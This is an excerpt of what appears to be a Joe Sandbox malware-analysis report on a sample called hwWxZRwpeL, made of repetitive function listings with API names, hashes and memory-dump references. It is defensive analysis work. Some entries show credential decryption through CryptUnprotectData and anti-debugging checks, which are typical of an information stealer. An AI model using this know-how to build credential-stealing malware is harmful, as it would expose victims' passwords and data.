                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$K@1@LeaveMaybe@_RandomUint64@mozilla@@$Entermemset
                                                                                                                                                                                                                                                                                                                                  • String ID: MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2950001534-1351931279
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ea4c90d9e752687343f05b2779745a953e1c4d2d19bfae41b9c233d50a2ed5ac
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f3e17908c496ad3808370fe0b65830060b1c6b4bda7ed4468f47d1f4d58f2bda
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea4c90d9e752687343f05b2779745a953e1c4d2d19bfae41b9c233d50a2ed5ac
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E726C72A057118FD708CF29C940615FBE1BF89328F2AC66DE8699B791D375E842CF81
                                                                                                                                                                                                                                                                                                                                  Function 6C622C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C622C31
                                                                                                                                                                                                                                                                                                                                  • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C622C61
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5D4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C5D4E5A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5D4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C5D4E97
                                                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C622C82
                                                                                                                                                                                                                                                                                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C622E2D
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5E81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C5E81DE
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                                                                                                                                                                                                                                                                  • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                                                                                                                                                                                                                                                                  • API String ID: 801438305-4149320968
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3fc6e3b21afc5fb85b76c0c1477065f06cb198d8c8ec7c0ab94e3b91b4c5ddd8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7c0315decc3cfe55f92c1dff790d5e4f86b191e4295c62bb6e862579fcc93fd8
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fc6e3b21afc5fb85b76c0c1477065f06cb198d8c8ec7c0ab94e3b91b4c5ddd8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4591CF706087408FC724CF24C48069EB7E5AFCA368F508D2DE59A9B750DB34D949CF5A
                                                                                                                                                                                                                                                                                                                                  Function 6C639E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: __aulldiv__aullrem
                                                                                                                                                                                                                                                                                                                                  • String ID: -Infinity$NaN
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3839614884-2141177498
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2547baa74b8a9d7c537d0222108f279f98d0d1de98271610e428ed809b505059
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bf78aff0c190cd5e576f458b8ea03b61670c9ddb3bc15d65e8463fac0895bfc1
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2547baa74b8a9d7c537d0222108f279f98d0d1de98271610e428ed809b505059
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8C1B271E043288BDF14CF98C8407DEB7B6EF89308F546529D409ABB81DB70AC45CB99
                                                                                                                                                                                                                                                                                                                                  Function 6C5DD4E0 Relevance: 10.8, Strings: 8, Instructions: 805COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: $-$0$0$1$8$9$@
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-3654031807
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1f4ee1e053619c69e7e5d3de91a50fefdaa2f8fabd50e127471d6a79557af6b9
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 683ad62dc0fb9157887a6b4d3c0f9c90a4f09d33138f5c9a463ef234272fe6d1
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f4ee1e053619c69e7e5d3de91a50fefdaa2f8fabd50e127471d6a79557af6b9
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C362BE7150C3458FD711CF2CC89076ABBF2AF86358F1A8A4DE4D54BA51C335A885CFAA
                                                                                                                                                                                                                                                                                                                                  Function 0041B63A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0041BEA2
                                                                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BEB7
                                                                                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(eM), ref: 0041BEC2
                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BEDE
                                                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 0041BEE5
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                                                                                                  • String ID: eM
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2579439406-4107679315
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e0cf9fd370cfefa4586a3e07c7ad2671862445e1fb84a52232205764a1bb9e34
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC21CCB8902214DFC710DF69FC85A883BB4FB18314F12807BE90887262E7B499818F5D
                                                                                                                                                                                                                                                                                                                                  Function 6C64545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,000000FF,?), ref: 6C648A4B
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                                                                                                                                                                  • String ID: ~q]l
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2221118986-3028681918
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cee5edf43f4068935e0553135b682d0f28df9ff1d323248eb2cf0813c2387819
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80B10972E0121ACFDB14CF68CC907E9B7B6EF85314F1882A9C549EB791D7309989CB94
                                                                                                                                                                                                                                                                                                                                  Function 6C64542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,000000FF,?), ref: 6C6488F0
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C64925C
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                                                                                                                                                                  • String ID: ~q]l
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2221118986-3028681918
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 146dcedab37ed06f50cdefe45d16bd9a32bef373e5c947ab3528bcb5b1f9a4c6
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ECB1D572E0420A8FDB14CF68C8816EDB7B6AF85314F148269C949EB795D730A989CB94
                                                                                                                                                                                                                                                                                                                                  Function 0040A210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
                                                                                                                                                                                                                                                                                                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
                                                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                                                                                                                                                                                  • String ID: >O@
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4291131564-3498640338
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: de78b312e53d8eb1032a325daaba17a5ad67a9fc4c37dbc2dcfee383a82f1a49
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B11D474641308AFEB10CF64DC95FAA77B5EB88B04F208099FD159B3D0C776AA41CB50
                                                                                                                                                                                                                                                                                                                                  Function 004072A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0), ref: 004072AD
                                                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004072B4
                                                                                                                                                                                                                                                                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004072E1
                                                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407CF0,80000001,00416414), ref: 00407304
                                                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 0040730E
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3657800372-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 53cc3c192cf3f0b8553079c3b9831d6236397efc4a83699197ab53cf729bcbdc
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43010075E45308BBEB14DFA4DC45F9E7779AB44B00F104556FB05BA2C0D670AA009B55
                                                                                                                                                                                                                                                                                                                                  Function 00413970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100comCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • CoCreateInstance.COMBASE(0041E120,00000000,00000001,0041E110,00000000), ref: 004139A8
                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00413A00
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                                                                                                                                                                                  • String ID: ,<A
                                                                                                                                                                                                                                                                                                                                  • API String ID: 123533781-3158208111
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
